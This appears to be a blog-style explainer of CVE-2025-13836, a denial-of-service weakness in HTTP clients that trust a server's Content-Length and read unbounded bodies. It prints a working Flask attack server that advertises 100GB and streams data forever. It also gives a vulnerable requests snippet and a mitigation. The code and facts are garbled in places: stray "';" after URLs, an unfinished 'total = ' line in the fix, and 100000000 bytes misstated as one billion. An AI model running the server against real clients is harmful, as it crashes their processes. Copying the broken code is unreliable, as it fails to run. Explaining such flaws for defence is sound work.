HTTP clients are everywhere—web browsers, API clients, bots. But sometimes, an overlooked default can open the door for attackers. CVE-2025-13836 highlights one of these simple, yet dangerous, issues: when HTTP clients read server responses without specifying a byte limit, the client may trust the server’s Content-Length value. This can let a malicious server trigger Out-Of-Memory (OOM) errors or Denial-of-Service (DoS) attacks.

In this guide, we'll explain how this happens, view reference materials, see example code, and build a working exploit to illustrate the danger.

🛑 Vulnerability Summary

Many HTTP clients, when receiving a server response, use the Content-Length header to know how many bytes to read. But there's a catch: if the client just trusts this number without bounds—or doesn't specify any read limit at all—a malicious server can tell the client to read gigabytes, or more, of data.

This data is loaded into memory, and if the system can’t handle it, the process will crash or become unresponsive.

Attack Scenario

- Step 1: Attacker sets up a server that responds with a huge Content-Length header (e.g., 100GB).
- Step 2: Client, using default settings, tries to read and allocate memory for the entire response.

👨‍💻 Code Example (Python)

Here's a simple Python snippet using requests, a popular HTTP client library.

import requests

# URL controlled by attacker
response = requests.get('http://malicious-server.example/large-response';)

# The following will try to read the entire response body into memory at once.
data = response.content  # Danger! May trigger OOM

If the server returns

HTTP/1.1 200 OK
Content-Length: 100000000

The line response.content will try to load all 1 billion bytes into RAM, even if the server never really delivers that much—or worse, streams it forever.

Let's see a quick Python exploit server using Flask that demonstrates the attack

from flask import Flask, Response

app = Flask(__name__)

@app.route('/large-response')
def big_response():
    # Send a huge content-length, stream data forever
    def generate():
        # We'll stream data forever
        while True:
            yield b'A' * 1024 * 1024   # 1MB chunks

    headers = {
        'Content-Length': str(100 * 1024 * 1024 * 1024)  # 100GB
    }
    return Response(generate(), headers=headers, mimetype='application/octet-stream')

if __name__ == '__main__':
    app.run(port=800)

🚨 Impact

- DoS/OOM: The client process crashes or becomes very slow.

Resource Waste: Makes resource exhaustion attacks much easier.

- Potential Chaining: Can be turned into a remote DoS in more complex applications (APIs, microservices, etc.).

Always set a sensible limit on the amount of data you’re willing to read! For instance

from requests import get

url = 'http://malicious-server.example/large-response';
with get(url, stream=True) as r:
    chunk_size = 1024  # bytes
    max_download = 1024 * 1024 * 10  # 10MB max
    total = 
    for chunk in r.iter_content(chunk_size=chunk_size):
        total += len(chunk)
        if total > max_download:
            raise Exception("Stopping: Too much data")
        # process(chunk)

Most language clients have a way to read responses in chunks—use them!

📚 References

- CVE-2025-13836 at MITRE (awaiting public allocation)
- Python requests Documentation
- Node.js HTTP client issue with large Content-Length
- Relevant Go HTTP bug
- Security best practices for HTTP clients

Audit: Review code for where response data is read into memory.

CVE-2025-13836 is a reminder: simple mistakes with big consequences. Keep your clients safe—limit what they’ll accept from the other side.

Timeline

Published on: 12/01/2025 18:02:38 UTC
Last modified on: 02/10/2026 19:58:12 UTC